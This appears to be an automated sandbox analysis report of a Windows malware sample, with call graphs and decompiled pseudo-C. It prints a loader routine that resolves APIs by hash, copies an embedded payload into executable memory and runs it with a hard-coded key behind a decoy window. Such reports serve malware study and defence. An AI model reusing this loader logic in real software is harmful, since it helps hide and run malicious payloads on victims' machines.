                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:309
                                                                                                Total number of Limit Nodes:4

                                                                                                Graph

                                                                                                execution_graph 911 c12dc2 912 c12dfe 911->912 914 c12dd4 911->914 913 c12df9 ?terminate@ 913->912 914->912 914->913 915 c12742 916 c12750 915->916 917 c12775 ?_type_info_dtor_internal_method@type_info@ 915->917 919 c12770 916->919 920 c12769 ??3@YAXPAX 916->920 918 c12780 ??3@YAXPAX 917->918 917->919 918->919 920->919 921 c13347 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 931 c11fcf ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 932 c133ce 937 c11be1 932->937 934 c133d8 935 c1283f 10 API calls 934->935 936 c133e2 935->936 943 c130b8 937->943 939 c11bed ??2@YAPAXI 940 c11bfc 939->940 944 c11c81 ??2@YAPAXI 940->944 942 c11c0d 942->934 943->939 945 c11c8d 944->945 945->942 946 c1338e ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 953 c12c93 954 c12cb7 ?terminate@ 953->954 955 c12cac 953->955 956 c12cbf __onexit 954->956 894 c1285b 899 c1283f 894->899 897 c128a0 898 c12898 _amsg_exit 898->897 902 c1279a 899->902 901 c1284c __wgetmainargs 901->897 901->898 909 c12d44 902->909 904 c127a6 _decode_pointer 905 c127c9 7 API calls 904->905 906 c127bd _onexit 904->906 910 c12836 _unlock 905->910 908 c1282d __onexit 906->908 908->901 909->904 910->908 957 c132da ??1exception@std@@UAE 961 c12a1a _XcptFilter 962 c12d9d _except_handler4_common 774 c128a1 794 c12d44 774->794 776 c128ad GetStartupInfoW 777 c128de InterlockedCompareExchange 776->777 778 c128ef 777->778 779 c128eb 777->779 781 c12910 _amsg_exit 778->781 782 c1291a 778->782 779->778 780 c128f7 Sleep 779->780 780->777 783 c12943 781->783 782->783 784 c12923 _initterm_e 782->784 786 c12952 _initterm 783->786 787 c1296d 783->787 784->783 785 c1293e __onexit 784->785 786->787 788 c12972 InterlockedExchange 787->788 789 c1297a __IsNonwritableInCurrentImage 787->789 788->789 789->785 791 c12a4a 789->791 792 c129fe exit 789->792 795 c121fd LoadLibraryExA 789->795 791->785 793 c12a52 _cexit 791->793 792->789 793->785 794->776 796 c12241 _time64 srand rand 795->796 797 c12230 795->797 796->797 797->796 798 c12269 797->798 820 c11ff2 GetPEB 798->820 800 c122d1 846 c1272c 800->846 801 c1227c 801->800 804 c122e9 atoi 801->804 803 c123c0 803->789 805 c12305 VirtualAllocExNuma 804->805 805->800 806 c1230f memcpy 805->806 824 c120cd 806->824 811 c12352 829 c12435 CreateWindowExW 811->829 814 c12365 LoadAcceleratorsW 815 c1239e GetMessageW 814->815 816 c12378 TranslateAcceleratorW 815->816 817 c123ab 815->817 816->815 818 c1238a TranslateMessage DispatchMessageW 816->818 834 c111ba 817->834 818->815 821 c1200c _wcslwr 820->821 822 c1201e 821->822 822->821 823 c1203b 822->823 823->801 825 c120f8 824->825 826 c1272c __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 7 API calls 825->826 827 c121f5 LoadStringW LoadStringW 826->827 828 c123c4 LoadIconW LoadCursorW LoadIconW RegisterClassExW 827->828 828->811 830 c12471 GetClientRect 829->830 831 c1235c 829->831 852 c11129 8 API calls 830->852 831->800 831->814 890 c11c1e 834->890 837 c11c1e ??3@YAXPAX 838 c111cf 6 API calls 837->838 839 c1122b 838->839 840 c11242 839->840 841 c11234 DeleteDC 839->841 842 c11252 DeleteObject 840->842 843 c1125c 840->843 841->840 842->843 844 c11265 DeleteObject 843->844 845 c1126f 843->845 844->845 845->800 847 c12734 846->847 848 c12736 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 846->848 847->803 850 c12c54 _crt_debugger_hook 848->850 851 c12c5c GetCurrentProcess TerminateProcess 848->851 850->851 851->803 857 c11741 852->857 855 c11741 11 API calls 856 c111b2 ShowWindow UpdateWindow 855->856 856->831 858 c1174c 857->858 861 c111a2 858->861 862 c11772 rand 858->862 872 c11c50 858->872 861->855 863 c11798 862->863 864 c1179e rand 862->864 863->864 865 c117b6 rand 864->865 867 c117f2 865->867 868 c117f8 rand rand 865->868 867->868 869 c11842 868->869 870 c1182c 868->870 869->858 870->869 871 c11838 GetStockObject 870->871 871->869 877 c11d70 ??2@YAPAXI 872->877 876 c11c74 876->858 878 c11c66 877->878 879 c11da6 878->879 880 c11db2 __EH_prolog3 879->880 881 c11dc0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 880->881 883 c11ded 880->883 885 c11083 881->885 883->876 884 c11ddf _CxxThrowException 884->883 889 c130b8 885->889 887 c1108f ??0exception@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 888 c110bd 887->888 888->884 889->887 891 c11c34 890->891 892 c111c5 890->892 893 c11c35 ??3@YAXPAX 891->893 892->837 893->892 893->893 963 c12b60 966 c12ff8 963->966 965 c12b65 965->965 967 c1302a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 966->967 968 c1301d 966->968 969 c13021 967->969 968->967 968->969 969->965 974 c11e25 975 c11e34 ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 974->975 976 c11e3c 974->976 975->976 977 c133e4 978 c11c1e ??3@YAXPAX 977->978 979 c133ef ??3@YAXPAX ??3@YAXPAX 978->979 980 c11067 985 c1103e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1exception@std@@UAE 980->985 986 c124a9 987 c124d3 986->987 988 c125c6 986->988 989 c125a1 987->989 990 c124d9 987->990 991 c125d3 988->991 992 c126af 988->992 1014 c12551 989->1014 1050 c11340 989->1050 993 c124e2 990->993 994 c1258c SetTimer 990->994 995 c12679 SetCapture 991->995 996 c125da 991->996 992->1014 1064 c112e2 GetClientRect 992->1064 997 c124e9 993->997 998 c1257f PostQuitMessage 993->998 994->1014 995->1014 999 c125e1 996->999 1000 c1266a ReleaseCapture 996->1000 1003 c124f2 997->1003 1010 c125e8 997->1010 998->1014 1005 c125e5 999->1005 1006 c1265a SetCapture 999->1006 1000->1014 1002 c1272c __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 7 API calls 1007 c126ef 1002->1007 1008 c124f7 1003->1008 1009 c12559 BeginPaint 1003->1009 1005->1010 1011 c125fe 1005->1011 1006->1014 1008->1014 1015 c12513 DefWindowProcW 1008->1015 1021 c12510 1008->1021 1022 c12536 DialogBoxParamW 1008->1022 1025 c113af 1009->1025 1010->1015 1057 c1122b 1010->1057 1013 c12607 GetClientRect PtInRect 1011->1013 1011->1014 1013->1014 1018 c1262f ReleaseCapture 1013->1018 1014->1002 1015->1014 1018->1014 1020 c12643 1018->1020 1019 c1256c EndPaint 1019->1014 1023 c1122b 3 API calls 1020->1023 1021->1015 1024 c1252a DestroyWindow 1021->1024 1022->1014 1023->1014 1024->1014 1067 c130b8 1025->1067 1027 c113be GetClientRect 1028 c11414 1027->1028 1029 c11467 9 API calls 1028->1029 1068 c11271 1028->1068 1071 c1186a SaveDC SelectClipRgn 1029->1071 1033 c1152c 1034 c1186a 11 API calls 1033->1034 1035 c11558 RestoreDC DeleteObject DeleteObject 1034->1035 1082 c119a1 CreateCompatibleDC 1035->1082 1037 c11583 1087 c116a2 GetTickCount64 1037->1087 1041 c1160c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@N 1042 c11ead 9 API calls 1041->1042 1043 c1161d ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2 1042->1043 1044 c11638 DrawTextA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1043->1044 1046 c1168c ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 1044->1046 1048 c11661 1044->1048 1047 c116a1 1046->1047 1047->1019 1049 c1167c BitBlt 1048->1049 1049->1046 1051 c1139f InvalidateRect 1050->1051 1052 c1135f 1050->1052 1051->1014 1053 c11c1e ??3@YAXPAX 1052->1053 1054 c1136e GetClientRect 1053->1054 1055 c11741 11 API calls 1054->1055 1056 c1138e 1055->1056 1056->1051 1058 c11242 1057->1058 1059 c11234 DeleteDC 1057->1059 1060 c11252 DeleteObject 1058->1060 1061 c1125c 1058->1061 1059->1058 1060->1061 1062 c11265 DeleteObject 1061->1062 1063 c1126f 1061->1063 1062->1063 1063->1015 1131 c13176 1064->1131 1067->1027 1069 c112e0 1068->1069 1070 c11280 6 API calls 1068->1070 1069->1029 1070->1069 1078 c1189d 1071->1078 1072 c118a9 _invalid_parameter_noinfo 1072->1078 1073 c11990 RestoreDC 1073->1033 1076 c11df8 2 API calls 1076->1078 1077 c11df8 _invalid_parameter_noinfo _invalid_parameter_noinfo 1077->1078 1078->1072 1078->1073 1078->1077 1079 c11979 Rectangle 1078->1079 1080 c11924 Ellipse 1078->1080 1102 c11df8 1078->1102 1107 c11c99 1078->1107 1079->1078 1080->1078 1083 c119cd 1082->1083 1084 c119dc SelectObject AlphaBlend DeleteDC 1082->1084 1112 c11a1f OffsetRect 1083->1112 1084->1037 1088 c1158a SetBkMode DrawTextA ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H 1087->1088 1089 c11ead 1088->1089 1090 c11eb9 __EH_prolog3_catch 1089->1090 1117 c11cca 1090->1117 1093 c11f48 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHPBDH 1096 c11fa2 1093->1096 1097 c11efa ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 1093->1097 1094 c11f3e 1094->1093 1094->1097 1095 c11f1e ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 1095->1094 1099 c11ef0 1095->1099 1096->1097 1101 c11fa6 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 1096->1101 1123 c11d28 1097->1123 1099->1093 1099->1094 1099->1095 1099->1097 1100 c11f94 1100->1041 1101->1096 1101->1097 1103 c11e05 _invalid_parameter_noinfo 1102->1103 1104 c11e0d 1102->1104 1103->1104 1105 c11e1b _invalid_parameter_noinfo 1104->1105 1106 c118c0 SelectObject 1104->1106 1105->1106 1106->1076 1108 c11ca6 _invalid_parameter_noinfo 1107->1108 1109 c11cae 1107->1109 1108->1109 1110 c11cbc _invalid_parameter_noinfo 1109->1110 1111 c11cbe 1109->1111 1110->1111 1111->1078 1113 c11b09 1112->1113 1113->1113 1114 c11b6a 6 API calls 1113->1114 1115 c1272c __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 7 API calls 1114->1115 1116 c119da 1115->1116 1116->1084 1118 c11cd6 __EH_prolog3 1117->1118 1119 c11ce8 ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 1118->1119 1120 c11cee 1118->1120 1119->1120 1121 c11d0e 1120->1121 1122 c11d06 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12 1120->1122 1121->1099 1122->1121 1130 c130b8 1123->1130 1125 c11d34 ?uncaught_exception@std@ 1126 c11d45 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 1125->1126 1127 c11d4d 1125->1127 1126->1127 1128 c11d60 ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 1127->1128 1129 c11d68 1127->1129 1128->1129 1129->1100 1130->1125 1132 c1130e InvalidateRect 1131->1132 1132->1014 1133 c11fed 1134 c11f75 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 1133->1134 1135 c11d28 3 API calls 1134->1135 1136 c11f94 1135->1136 1140 c12a2e 1141 c12a43 _exit 1140->1141 1142 c12a4a 1140->1142 1141->1142 1143 c12a52 _cexit 1142->1143 1144 c12a58 __onexit 1142->1144 1143->1144 1148 c133b8 1149 c11be1 2 API calls 1148->1149 1150 c133c2 1149->1150 1151 c1283f 10 API calls 1150->1151 1152 c133cc 1151->1152 1153 c11e3d 1156 c110ed 1153->1156 1155 c11e49 1160 c130b8 1156->1160 1158 c110f9 ??0exception@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1159 c11126 1158->1159 1159->1155 1160->1158 1161 c12a7f 1163 c12a8d __set_app_type _encode_pointer __p__fmode __p__commode 1161->1163 1164 c12b2c _pre_c_init __RTC_Initialize 1163->1164 1165 c12b46 1164->1165 1166 c12b3a __setusermatherr 1164->1166 1171 c12fca _controlfp_s 1165->1171 1166->1165 1169 c12b54 _configthreadlocale 1170 c12b5d 1169->1170 1172 c12b4b 1171->1172 1173 c12fe6 _invoke_watson 1171->1173 1172->1169 1172->1170 1173->1172 1174 c132bf 1175 c1272c __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 7 API calls 1174->1175 1176 c132d0 1175->1176 1177 c132fe 1178 c11d28 3 API calls 1177->1178 1179 c13307 1178->1179

                                                                                                Callgraph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                • Opacity -> Relevance
                                                                                                • Disassembly available
                                                                                                callgraph 0 Function_00C12DC2 1 Function_00C123C4 2 Function_00C110C6 3 Function_00C110CB 105 Function_00C1103E 3->105 4 Function_00C11CCA 47 Function_00C130B8 4->47 91 Function_00C13121 4->91 5 Function_00C12FCA 6 Function_00C120CD 97 Function_00C1272C 6->97 7 Function_00C11FCF 8 Function_00C133CE 11 Function_00C11BE1 8->11 104 Function_00C1283F 8->104 9 Function_00C12CCE 28 Function_00C12D89 9->28 55 Function_00C12D44 9->55 86 Function_00C12D19 9->86 10 Function_00C132DA 26 Function_00C11C81 11->26 11->47 11->91 12 Function_00C132E3 12->97 13 Function_00C112E2 77 Function_00C13176 13->77 14 Function_00C133E4 90 Function_00C11C1E 14->90 15 Function_00C130EB 16 Function_00C11FED 16->91 95 Function_00C11D28 16->95 17 Function_00C110ED 17->47 17->91 18 Function_00C11FF2 19 Function_00C126F5 20 Function_00C12FF5 21 Function_00C12FF8 22 Function_00C11DF8 23 Function_00C131F8 23->28 23->55 24 Function_00C121FD 24->1 24->6 24->18 49 Function_00C111BA 24->49 56 Function_00C12047 24->56 24->97 101 Function_00C12435 24->101 25 Function_00C132FE 25->95 27 Function_00C11083 27->47 27->91 29 Function_00C12F8B 30 Function_00C1338E 31 Function_00C12C93 31->28 32 Function_00C11C99 33 Function_00C1339A 33->97 34 Function_00C1279A 34->28 34->55 102 Function_00C12836 34->102 35 Function_00C12D9D 36 Function_00C12F9F 37 Function_00C119A1 89 Function_00C11A1F 37->89 38 Function_00C128A1 38->24 38->28 38->55 80 Function_00C12F00 38->80 39 Function_00C116A2 40 Function_00C11DA6 40->27 40->47 40->91 41 Function_00C124A9 41->13 44 Function_00C113AF 41->44 52 Function_00C11340 41->52 96 Function_00C1122B 41->96 41->97 42 Function_00C132AA 58 Function_00C13248 42->58 43 Function_00C11EAD 43->4 43->15 43->91 43->95 44->37 44->39 44->43 44->47 53 Function_00C13140 44->53 69 Function_00C1186A 44->69 71 Function_00C11271 44->71 44->91 45 Function_00C12EB0 46 Function_00C132B7 48 Function_00C133B8 48->11 48->104 49->90 50 Function_00C132BF 50->97 51 Function_00C11741 59 Function_00C11C50 51->59 76 Function_00C11772 51->76 52->51 61 Function_00C11E55 52->61 52->90 54 Function_00C12742 54->9 57 Function_00C13347 58->23 59->40 72 Function_00C11D70 59->72 60 Function_00C13350 60->97 79 Function_00C11000 61->79 62 Function_00C1285B 62->104 63 Function_00C1105B 64 Function_00C1315D 65 Function_00C12B60 65->21 66 Function_00C11067 66->105 67 Function_00C12A66 68 Function_00C1336B 69->22 69->32 69->53 70 Function_00C12A6A 70->28 73 Function_00C12C70 73->28 73->55 74 Function_00C12E70 75 Function_00C13373 75->97 78 Function_00C12A7F 78->5 78->20 87 Function_00C12E18 78->87 80->45 80->74 81 Function_00C13509 82 Function_00C13308 82->97 83 Function_00C12E0F 84 Function_00C13410 84->90 85 Function_00C13215 86->73 88 Function_00C12A1A 89->97 92 Function_00C13323 93 Function_00C11E25 94 Function_00C11129 94->51 95->47 95->91 98 Function_00C1332C 98->97 99 Function_00C12A2E 99->28 100 Function_00C13231 100->28 101->94 103 Function_00C11E3D 103->17 104->34 106 Function_00C12E3E

                                                                                                Executed Functions

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 71%
                                                                                                			E00C121FD(void* __edx, struct HACCEL__* _a4, intOrPtr _a16) {
                                                                                                				signed int _v8;
                                                                                                				void _v60;
                                                                                                				void* _v64;
                                                                                                				signed short _v68;
                                                                                                				intOrPtr _v72;
                                                                                                				struct HACCEL__* _v76;
                                                                                                				intOrPtr _v80;
                                                                                                				intOrPtr _v84;
                                                                                                				struct tagMSG _v112;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t29;
                                                                                                				int _t32;
                                                                                                				signed int _t34;
                                                                                                				struct HACCEL__* _t37;
                                                                                                				void* _t44;
                                                                                                				intOrPtr _t45;
                                                                                                				struct HACCEL__* _t47;
                                                                                                				struct HACCEL__* _t62;
                                                                                                				signed int _t77;
                                                                                                				void* _t83;
                                                                                                				void* _t90;
                                                                                                				signed int _t91;
                                                                                                
                                                                                                				_t83 = __edx;
                                                                                                				_t29 =  *0xc16018; // 0x4f3fb031
                                                                                                				_v8 = _t29 ^ _t91;
                                                                                                				_v76 = _a4;
                                                                                                				_v68 = 0x442c83;
                                                                                                				_t32 = LoadLibraryExA("schtasks.exe", 0, 0); // executed
                                                                                                				if(_t32 != 0) {
                                                                                                					_v68 = 0xcfdb;
                                                                                                					 *0xc16034 = 0x5887;
                                                                                                				}
                                                                                                				do {
                                                                                                					__imp___time64(0);
                                                                                                					srand(_t32);
                                                                                                					_t34 = rand() & 0x80000003;
                                                                                                					if(_t34 < 0) {
                                                                                                						_t34 = (_t34 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                					}
                                                                                                					_t32 = _t34 + 1;
                                                                                                				} while (_t32 <= 3);
                                                                                                				_t77 = 0xc;
                                                                                                				memcpy( &_v60, "0WmfLjNQIqUtwtvadlxNXC?y~xbeK~$uLkOQa%?~Wj4a3#Lu", _t77 << 2);
                                                                                                				asm("movsb");
                                                                                                				_t89 = E00C11FF2();
                                                                                                				_t37 = E00C12047(_t36, 0x1e27f4fd);
                                                                                                				_t87 = _t37;
                                                                                                				_v64 = E00C12047(_t36, 0xbce8a04f);
                                                                                                				_v80 = E00C12047(_t36, 0x5e97c023);
                                                                                                				_v84 = E00C12047(_t89, 0x355a1f6f);
                                                                                                				_v72 = E00C12047(_t89, 0x5b9200a9);
                                                                                                				_t90 = _t37->i(0, _v68 & 0x0000ffff, 0xa);
                                                                                                				if(_t90 != 0) {
                                                                                                					_t44 = _v64(0, _t90);
                                                                                                					_v64 = _t44;
                                                                                                					if(_t44 == 0) {
                                                                                                						goto L6;
                                                                                                					}
                                                                                                					_t47 = _v80(0, _t90);
                                                                                                					_t87 = _t47;
                                                                                                					_t90 = _v84(_v72(0, _t87, atoi("4096") | 0x00002000, 0x40, 0));
                                                                                                					if(_t90 == 0) {
                                                                                                						goto L6;
                                                                                                					}
                                                                                                					memcpy(_t90, _v64, _t87);
                                                                                                					E00C120CD();
                                                                                                					 *_t90(_t90, _t87,  &_v60, _t90);
                                                                                                					_t87 = _v76;
                                                                                                					_t90 = LoadStringW;
                                                                                                					LoadStringW(_t87, 0x67, 0xc164d8, 0x64);
                                                                                                					LoadStringW(_t87, 0x6d, 0xc16410, 0x64);
                                                                                                					E00C123C4(_t87);
                                                                                                					if(E00C12435(_t87, _a16) == 0) {
                                                                                                						goto L6;
                                                                                                					} else {
                                                                                                						_t62 = LoadAcceleratorsW(_t87, 0x6d);
                                                                                                						_t90 = GetMessageW;
                                                                                                						_t87 = _t62;
                                                                                                						while(GetMessageW( &_v112, 0, 0, 0) != 0) {
                                                                                                							if(TranslateAcceleratorW(_v112, _t87,  &_v112) == 0) {
                                                                                                								TranslateMessage( &_v112);
                                                                                                								DispatchMessageW( &_v112);
                                                                                                							}
                                                                                                						}
                                                                                                						E00C111BA();
                                                                                                						_t45 = _v112.wParam;
                                                                                                						L15:
                                                                                                						return E00C1272C(_t45, 0, _v8 ^ _t91, _t83, _t87, _t90);
                                                                                                					}
                                                                                                				}
                                                                                                				L6:
                                                                                                				_t45 = 0;
                                                                                                				goto L15;
                                                                                                			}



























                                                                                                0x00c121fd
                                                                                                0x00c12203
                                                                                                0x00c1220a
                                                                                                0x00c1221c
                                                                                                0x00c1221f
                                                                                                0x00c12226
                                                                                                0x00c1222e
                                                                                                0x00c12230
                                                                                                0x00c12237
                                                                                                0x00c12237
                                                                                                0x00c12241
                                                                                                0x00c12242
                                                                                                0x00c12249
                                                                                                0x00c12257
                                                                                                0x00c1225c
                                                                                                0x00c12262
                                                                                                0x00c12262
                                                                                                0x00c12263
                                                                                                0x00c12264
                                                                                                0x00c1226b
                                                                                                0x00c12274
                                                                                                0x00c12276
                                                                                                0x00c1227c
                                                                                                0x00c12283
                                                                                                0x00c1228d
                                                                                                0x00c12299
                                                                                                0x00c122a6
                                                                                                0x00c122b3
                                                                                                0x00c122be
                                                                                                0x00c122cb
                                                                                                0x00c122cf
                                                                                                0x00c122da
                                                                                                0x00c122dd
                                                                                                0x00c122e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c122e6
                                                                                                0x00c122f1
                                                                                                0x00c12309
                                                                                                0x00c1230d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c12314
                                                                                                0x00c12320
                                                                                                0x00c12328
                                                                                                0x00c1232a
                                                                                                0x00c1232d
                                                                                                0x00c1233d
                                                                                                0x00c12349
                                                                                                0x00c1234d
                                                                                                0x00c1235f
                                                                                                0x00000000
                                                                                                0x00c12365
                                                                                                0x00c12368
                                                                                                0x00c1236e
                                                                                                0x00c12374
                                                                                                0x00c1239e
                                                                                                0x00c12388
                                                                                                0x00c1238e
                                                                                                0x00c12398
                                                                                                0x00c12398
                                                                                                0x00c12388
                                                                                                0x00c123ab
                                                                                                0x00c123b0
                                                                                                0x00c123b3
                                                                                                0x00c123c1
                                                                                                0x00c123c1
                                                                                                0x00c1235f
                                                                                                0x00c122d1
                                                                                                0x00c122d1
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • LoadLibraryExA.KERNELBASE(schtasks.exe,00000000,00000000), ref: 00C12226
                                                                                                • _time64.MSVCR90 ref: 00C12242
                                                                                                • srand.MSVCR90 ref: 00C12249
                                                                                                • rand.MSVCR90 ref: 00C12251
                                                                                                • atoi.MSVCR90 ref: 00C122F3
                                                                                                • VirtualAllocExNuma.KERNELBASE(00000000), ref: 00C12306
                                                                                                • memcpy.MSVCR90 ref: 00C12314
                                                                                                • LoadStringW.USER32(?,00000067,00C164D8,00000064), ref: 00C1233D
                                                                                                • LoadStringW.USER32(?,0000006D,00C16410,00000064), ref: 00C12349
                                                                                                • LoadAcceleratorsW.USER32 ref: 00C12368
                                                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C12380
                                                                                                • TranslateMessage.USER32(?), ref: 00C1238E
                                                                                                • DispatchMessageW.USER32 ref: 00C12398
                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C123A5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: Load$Message$StringTranslate$AcceleratorAcceleratorsAllocDispatchLibraryNumaVirtual_time64atoimemcpyrandsrand
                                                                                                • String ID: 0WmfLjNQIqUtwtvadlxNXC?y~xbeK~$uLkOQa%?~Wj4a3#Lu$4096$schtasks.exe
                                                                                                • API String ID: 1692861963-3368545145
                                                                                                • Opcode ID: 8c99ab0c7096f4e38d415a792dd8f07fdf6f288ca7c95037349106f49155464b
                                                                                                • Instruction ID: 10b977d3cb515a8d67673702935da28c695f4bb38f3c8e7a6f67b5b831b88493
                                                                                                • Opcode Fuzzy Hash: 8c99ab0c7096f4e38d415a792dd8f07fdf6f288ca7c95037349106f49155464b
                                                                                                • Instruction Fuzzy Hash: 4451B4B5D00218BBDB14ABB09C89FEE7ABCEF4B310F104425F911F7150DB748991AB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 43 c1285b-c12896 call c1283f __wgetmainargs 46 c128a0 43->46 47 c12898-c1289f _amsg_exit 43->47 47->46
                                                                                                APIs
                                                                                                  • Part of subcall function 00C1283F: __onexit.MSVCRT ref: 00C12847
                                                                                                • __wgetmainargs.MSVCR90 ref: 00C12886
                                                                                                • _amsg_exit.MSVCR90 ref: 00C1289A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: __onexit__wgetmainargs_amsg_exit
                                                                                                • String ID:
                                                                                                • API String ID: 4257578400-0
                                                                                                • Opcode ID: 35e4ea89e8fa84dab0f9274beac45ca115afeccc58a9c076846ca3d26f280163
                                                                                                • Instruction ID: 63f4e73cc7cda97164264f3f37c37b775af22abefa961bd64677ec10d0b2207d
                                                                                                • Opcode Fuzzy Hash: 35e4ea89e8fa84dab0f9274beac45ca115afeccc58a9c076846ca3d26f280163
                                                                                                • Instruction Fuzzy Hash: 7FE0ECB85423016AD604AF249C027D936A0B71B709B42C0B8E941962A1DBB080E5F70A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 85%
                                                                                                			E00C1272C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                				intOrPtr _v0;
                                                                                                				void* _v804;
                                                                                                				intOrPtr _v808;
                                                                                                				intOrPtr _v812;
                                                                                                				intOrPtr _t6;
                                                                                                				intOrPtr _t11;
                                                                                                				intOrPtr _t12;
                                                                                                				intOrPtr _t13;
                                                                                                				intOrPtr _t19;
                                                                                                				intOrPtr _t20;
                                                                                                				intOrPtr _t23;
                                                                                                				intOrPtr _t24;
                                                                                                				intOrPtr _t25;
                                                                                                				intOrPtr* _t29;
                                                                                                				void* _t32;
                                                                                                
                                                                                                				_t25 = __esi;
                                                                                                				_t24 = __edi;
                                                                                                				_t23 = __edx;
                                                                                                				_t20 = __ecx;
                                                                                                				_t19 = __ebx;
                                                                                                				_t6 = __eax;
                                                                                                				_t32 = _t20 -  *0xc16018; // 0x4f3fb031
                                                                                                				if(_t32 == 0) {
                                                                                                					asm("repe ret");
                                                                                                				}
                                                                                                				 *0xc161d8 = _t6;
                                                                                                				 *0xc161d4 = _t20;
                                                                                                				 *0xc161d0 = _t23;
                                                                                                				 *0xc161cc = _t19;
                                                                                                				 *0xc161c8 = _t25;
                                                                                                				 *0xc161c4 = _t24;
                                                                                                				 *0xc161f0 = ss;
                                                                                                				 *0xc161e4 = cs;
                                                                                                				 *0xc161c0 = ds;
                                                                                                				 *0xc161bc = es;
                                                                                                				 *0xc161b8 = fs;
                                                                                                				 *0xc161b4 = gs;
                                                                                                				asm("pushfd");
                                                                                                				_pop( *0xc161e8);
                                                                                                				 *0xc161dc =  *_t29;
                                                                                                				 *0xc161e0 = _v0;
                                                                                                				 *0xc161ec =  &_a4;
                                                                                                				 *0xc16128 = 0x10001;
                                                                                                				_t11 =  *0xc161e0; // 0x0
                                                                                                				 *0xc160dc = _t11;
                                                                                                				 *0xc160d0 = 0xc0000409;
                                                                                                				 *0xc160d4 = 1;
                                                                                                				_t12 =  *0xc16018; // 0x4f3fb031
                                                                                                				_v812 = _t12;
                                                                                                				_t13 =  *0xc1601c; // 0xb0c04fce
                                                                                                				_v808 = _t13;
                                                                                                				 *0xc16120 = IsDebuggerPresent();
                                                                                                				_push(1);
                                                                                                				L00C1308E();
                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                				UnhandledExceptionFilter(0xc14254);
                                                                                                				if( *0xc16120 == 0) {
                                                                                                					_push(1);
                                                                                                					L00C1308E();
                                                                                                				}
